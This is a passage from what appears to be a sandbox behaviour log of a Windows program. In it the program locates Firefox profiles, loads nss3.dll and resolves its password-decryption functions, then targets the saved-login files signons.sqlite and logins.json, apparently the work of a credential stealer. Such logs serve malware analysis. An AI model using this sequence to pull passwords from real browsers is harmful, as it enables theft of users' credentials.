yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.727] wcslen (_String="zp0p8bce.default") returned 0x10 [0086.727] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.727] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.727] wcscat (in: _Dest=0x28a7b4, _Source="zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.727] wcscmp (_String1="zp0p8bce.default", _String2="..") returned 1 [0086.727] wcscmp (_String1="zp0p8bce.default", _String2=".") returned 1 [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.727] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0 [0086.727] FindClose (in: hFindFile=0x592dd8 | out: hFindFile=0x592dd8) returned 1 [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.727] wcslen (_String="*.*") returned 0x3 [0086.727] wcscpy (in: _Dest=0x28a2dc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.727] wcscat (in: _Dest=0x28a2dc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0086.727] wcscat (in: _Dest=0x28a2dc, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*" [0086.727] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0x592dd8 [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.727] wcslen (_String=".") returned 0x1 [0086.727] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.728] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0086.728] wcscat (in: _Dest=0x28a7b4, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\." [0086.728] wcscmp (_String1=".", _String2="..") returned -1 [0086.728] wcscmp (_String1=".", _String2=".") returned 0 [0086.728] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 1 [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.728] wcslen (_String="..") returned 0x2 [0086.728] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.728] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0086.728] wcscat (in: _Dest=0x28a7b4, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.." [0086.728] wcscmp (_String1="..", _String2="..") returned 0 [0086.728] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 1 [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.728] wcslen (_String="zp0p8bce.default") returned 0x10 [0086.728] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3f [0086.728] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0086.728] wcscat (in: _Dest=0x28a7b4, _Source="zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.728] wcscmp (_String1="zp0p8bce.default", _String2="..") returned 1 [0086.728] wcscmp (_String1="zp0p8bce.default", _String2=".") returned 1 [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x50 [0086.728] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0 [0086.728] FindClose (in: hFindFile=0x592dd8 | out: hFindFile=0x592dd8) returned 1 [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x38 [0086.728] wcslen (_String="profiles.ini") returned 0xc [0086.728] wcscpy (in: _Dest=0x28a28c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox" [0086.728] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x38 [0086.728] wcscat (in: _Dest=0x28a28c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\" [0086.728] wcscat (in: _Dest=0x28a28c, _Source="profiles.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0086.728] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0x2020 [0086.729] wcscpy (in: _Dest=0x28a4a0, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0086.729] wcscpy (in: _Dest=0x28a6aa, _Source="General" | out: _Dest="General") returned="General" [0086.729] _snwprintf (in: _Dest=0x28a8b4, _Count=0xff, _Format="Profile%d" | out: _Dest="Profile0") returned 8 [0086.729] wcscpy (in: _Dest=0x28a6aa, _Source="Profile0" | out: _Dest="Profile0") returned="Profile0" [0086.730] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x28aab4, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/zp0p8bce.default") returned 0x19 [0086.731] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0086.732] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x38 [0086.732] wcslen (_String="Profiles\\zp0p8bce.default") returned 0x19 [0086.732] wcscpy (in: _Dest=0x28a080, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox" [0086.732] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x38 [0086.732] wcscat (in: _Dest=0x28a080, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\" [0086.732] wcscat (in: _Dest=0x28a080, _Source="Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.732] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.732] _snwprintf (in: _Dest=0x28a8b4, _Count=0xff, _Format="Profile%d" | out: _Dest="Profile1") returned 8 [0086.733] wcscpy (in: _Dest=0x28a6aa, _Source="Profile1" | out: _Dest="Profile1") returned="Profile1" [0086.733] GetPrivateProfileStringW (in: lpAppName="Profile1", lpKeyName="Path", lpDefault="", lpReturnedString=0x28aab4, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="") returned 0x0 [0086.733] GetPrivateProfileIntW (lpAppName="Profile1", lpKeyName="IsRelative", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x0 [0086.734] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Mozilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x28a9ac | out: phkResult=0x28a9ac*=0xe8) returned 0x0 [0086.734] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x0, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Firefox", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0086.734] _wcsnicmp (_String1="Firefox", _String2="mozilla", _MaxCount=0x7) returned -7 [0086.734] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x1, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="MaintenanceService", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0086.734] _wcsnicmp (_String1="Mainten", _String2="mozilla", _MaxCount=0x7) returned -14 [0086.734] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x2, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0086.734] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0086.734] _snwprintf (in: _Dest=0x289b40, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox\\bin") returned 19 [0086.734] RegOpenKeyExW (in: hKey=0xe8, lpSubKey="Mozilla Firefox\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x289b10 | out: phkResult=0x289b10*=0x0) returned 0x2 [0086.734] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x3, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x0 [0086.735] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0086.735] _snwprintf (in: _Dest=0x289b40, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox 25.0\\bin") returned 24 [0086.735] RegOpenKeyExW (in: hKey=0xe8, lpSubKey="Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x289b10 | out: phkResult=0x289b10*=0xec) returned 0x0 [0086.735] RegQueryValueExW (in: hKey=0xec, lpValueName="PathToExe", lpReserved=0x0, lpType=0x289af4, lpData=0x28a750, lpcbData=0x289af8*=0x208 | out: lpType=0x289af4*=0x1, lpData="C:\\Program Files\\Mozilla Firefox\\firefox.exe", lpcbData=0x289af8*=0x5a) returned 0x0 [0086.735] RegCloseKey (hKey=0xec) returned 0x0 [0086.735] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0086.735] wcslen (_String="nss3.dll") returned 0x8 [0086.735] wcscpy (in: _Dest=0x289918, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0086.735] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0086.735] wcscat (in: _Dest=0x289918, _Source="\\" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\") returned="C:\\Program Files\\Mozilla Firefox\\" [0086.735] wcscat (in: _Dest=0x289918, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0086.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll")) returned 0x20 [0086.739] FindFirstFileW (in: lpFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll", lpFindFileData=0x289460 | out: lpFindFileData=0x289460) returned 0x592dd8 [0086.739] FindClose (in: hFindFile=0x592dd8 | out: hFindFile=0x592dd8) returned 1 [0086.739] CompareFileTime (lpFileTime1=0x28a9a0, lpFileTime2=0x28a998) returned 1 [0086.739] wcscpy (in: _Dest=0x28a340, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0086.739] RegEnumKeyExW (in: hKey=0xe8, dwIndex=0x4, lpName=0x28a550, lpcchName=0x289b20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x289b20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x289b18) returned 0x103 [0086.739] RegCloseKey (hKey=0xe8) returned 0x0 [0086.739] wcscpy (in: _Dest=0x28abd4, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0086.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28d96c | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0086.739] SetCurrentDirectoryW (lpPathName="C:\\Program Files\\Mozilla Firefox" (normalized: "c:\\program files\\mozilla firefox")) returned 1 [0086.739] wcslen (_String="nss3.dll") returned 0x8 [0086.739] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0086.739] wcscpy (in: _Dest=0x28a9c4, _Source="C:\\Program Files\\Mozilla Firefox" | out: _Dest="C:\\Program Files\\Mozilla Firefox") returned="C:\\Program Files\\Mozilla Firefox" [0086.739] wcslen (_String="C:\\Program Files\\Mozilla Firefox") returned 0x20 [0086.739] wcscat (in: _Dest=0x28a9c4, _Source="\\" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\") returned="C:\\Program Files\\Mozilla Firefox\\" [0086.739] wcscat (in: _Dest=0x28a9c4, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files\\Mozilla Firefox\\nss3.dll" [0086.740] GetModuleHandleW (lpModuleName="C:\\Program Files\\Mozilla Firefox\\nss3.dll") returned 0x0 [0086.801] LoadLibraryExW (lpLibFileName="C:\\Program Files\\Mozilla Firefox\\nss3.dll", hFile=0x0, dwFlags=0x8) returned 0x63270000 [0087.179] GetProcAddress (hModule=0x63270000, lpProcName="NSS_Init") returned 0x6332d70b [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="NSS_Shutdown") returned 0x6332d13c [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="PK11_GetInternalKeySlot") returned 0x632c3c51 [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="PK11_FreeSlot") returned 0x632c3333 [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="PK11_CheckUserPassword") returned 0x632acbc4 [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="PK11_Authenticate") returned 0x632ad3ca [0087.275] GetProcAddress (hModule=0x63270000, lpProcName="PK11SDR_Decrypt") returned 0x632c00a7 [0087.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default", cchWideChar=-1, lpMultiByteStr=0x28b850, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default", lpUsedDefaultChar=0x0) returned 83 [0087.308] NSS_Init () returned 0x0 [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcslen (_String="signons.txt") returned 0xb [0087.639] wcscpy (in: _Dest=0x28b430, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcscat (in: _Dest=0x28b430, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0087.639] wcscat (in: _Dest=0x28b430, _Source="signons.txt" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.txt") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.txt" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcslen (_String="signons2.txt") returned 0xc [0087.639] wcscpy (in: _Dest=0x28b220, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcscat (in: _Dest=0x28b220, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0087.639] wcscat (in: _Dest=0x28b220, _Source="signons2.txt" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons2.txt") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons2.txt" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcslen (_String="signons3.txt") returned 0xc [0087.639] wcscpy (in: _Dest=0x28ae00, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcscat (in: _Dest=0x28ae00, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0087.639] wcscat (in: _Dest=0x28ae00, _Source="signons3.txt" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons3.txt") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons3.txt" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcslen (_String="signons.sqlite") returned 0xe [0087.639] wcscpy (in: _Dest=0x28b010, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0087.639] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.639] wcscat (in: _Dest=0x28b010, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0087.639] wcscat (in: _Dest=0x28b010, _Source="signons.sqlite" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite" [0087.640] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.640] wcslen (_String="logins.json") returned 0xb [0087.640] wcscpy (in: _Dest=0x28b640, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0087.640] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0087.640] wcscat (in: _Dest=0x28b640, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0087.640] wcscat (in: _Dest=0x28b640, _Source="logins.json" | out: _Dest="C:\\Users\\BGC6u8Oy 